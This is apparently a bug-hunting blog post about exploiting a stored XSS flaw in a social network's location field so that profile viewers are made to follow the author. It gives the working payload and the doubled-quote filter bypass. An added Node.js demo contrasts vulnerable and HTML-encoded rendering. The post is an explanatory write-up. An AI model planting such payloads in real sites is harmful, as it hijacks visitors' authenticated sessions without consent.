Have fun with stored cross site scripting

We can do many different things with XSS, though we usually just pop an alert box. That is fine as a proof of concept, but this post goes a step further and does something practical with the bug.

Here I'm going to show how to exploit a stored cross-site scripting vulnerability in a social networking service. The end result: anyone who views my profile automatically becomes my follower.


After a common XSS test I noticed that line 154 of the page source was vulnerable. There was no filter on this input, because the web application expects you to pick one of its predefined locations rather than type a value. That expectation is only enforced on the client side, so we can submit JavaScript instead 🙂


When we click the TRACK button, the web application handles the action through an element with the id trackButtonsearch1, so I can trigger it with the JavaScript click() method. Before doing that, I wanted to understand how the web app actually handles these actions. I saw that it loads an external script called 'all.js'.


I opened it and pasted the code into http://jsbeautifier.org to make it readable. Then I found something interesting: the TRACK/UNTRACK actions are handled with jQuery.


There were several more functions handling other kinds of actions. Reading these files isn't required to launch the attack, but it is reassuring to know exactly what the click will do 😉

So this was my payload.


<script>window.onload = function (){document.getElementById(''trackButtonsearch1'').click()}</script>

Note the doubled single quotes around the element id: the web app dropped a lone ' from the input, so I had to write each one twice. There are several other ways to click a button from JavaScript. I might have used jQuery, but the developers weren't using the original minified jQuery file, so I stuck with plain DOM calls.
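To make the whole flow concrete, here is an added example (my own Node.js code, not the post's or the application's) that models it end to end: a quote filter that reproduces the behaviour described above (a lone ' is dropped, a doubled '' becomes one quote; that is an assumption about how the real filter worked), the vulnerable render that pastes the stored location into the page as-is, the hardened render that HTML-encodes it, and a tiny fake browser that runs any inline script against a stub DOM whose trackButtonsearch1 button follows the profile owner as the logged-in viewer. The element id is the one from the post; everything else is constructed for the demo.

```javascript
// Added example (not the blog's or the app's code): models the stored-XSS
// flow described in the post. quoteFilter, the render functions and the
// fake DOM are assumptions made for the demo; only the id is from the post.

// Assumption: the app's input filter drops a lone single quote but turns a
// doubled one into a literal quote. This reproduces what the post reports:
// '' survives the filter, a single ' does not.
function quoteFilter(input) {
  return input
    .replace(/''/g, "\u0000")   // protect doubled quotes
    .replace(/'/g, "")          // drop lone quotes
    .replace(/\u0000/g, "'");   // restore each doubled pair as one quote
}

// The payload as typed into the "location" field (doubled quotes).
const SUBMITTED =
  "<script>window.onload = function(){document.getElementById(''trackButtonsearch1'').click()}</script>";

// Vulnerable render: the stored value is concatenated straight into the page.
function renderProfileVulnerable(location) {
  return `<div class="profile"><span class="location">${location}</span></div>`;
}

// Hardened render: HTML-encode the five significant characters before output.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}
function renderProfileSafe(location) {
  return `<div class="profile"><span class="location">${escapeHtml(location)}</span></div>`;
}

// Stand-in for the victim's browser (constructed for the demo, not a real
// browser): runs every inline <script> in the rendered HTML against a fake
// DOM whose TRACK button follows the profile owner on behalf of the logged-in
// viewer, i.e. the request is made from the victim's own session.
function viewProfile(html, viewer) {
  const followers = [];
  const fakeDocument = {
    getElementById(id) {
      return id === "trackButtonsearch1"
        ? { click() { followers.push(viewer); } }
        : null;
    },
  };
  const fakeWindow = {};
  for (const [, body] of html.matchAll(/<script>([\s\S]*?)<\/script>/g)) {
    new Function("document", "window", body)(fakeDocument, fakeWindow);
  }
  if (typeof fakeWindow.onload === "function") fakeWindow.onload();
  return followers;
}

// Stand-alone run: the same stored value, rendered two ways.
const storedLocation = quoteFilter(SUBMITTED);
console.log("stored value:", storedLocation);
console.log("followers after viewing vulnerable page:",
  viewProfile(renderProfileVulnerable(storedLocation), "victim"));
console.log("followers after viewing hardened page:  ",
  viewProfile(renderProfileSafe(storedLocation), "victim"));
```

The point worth taking away: the click runs inside the victim's authenticated session, so a CSRF token or SameSite cookie on the follow request does nothing here. The fix is output encoding at render time (plus a Content-Security-Policy that disallows inline scripts as a second layer), not input stripping, which is exactly what the doubled quotes got around.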

Hope you find something interesting in stored XSS.
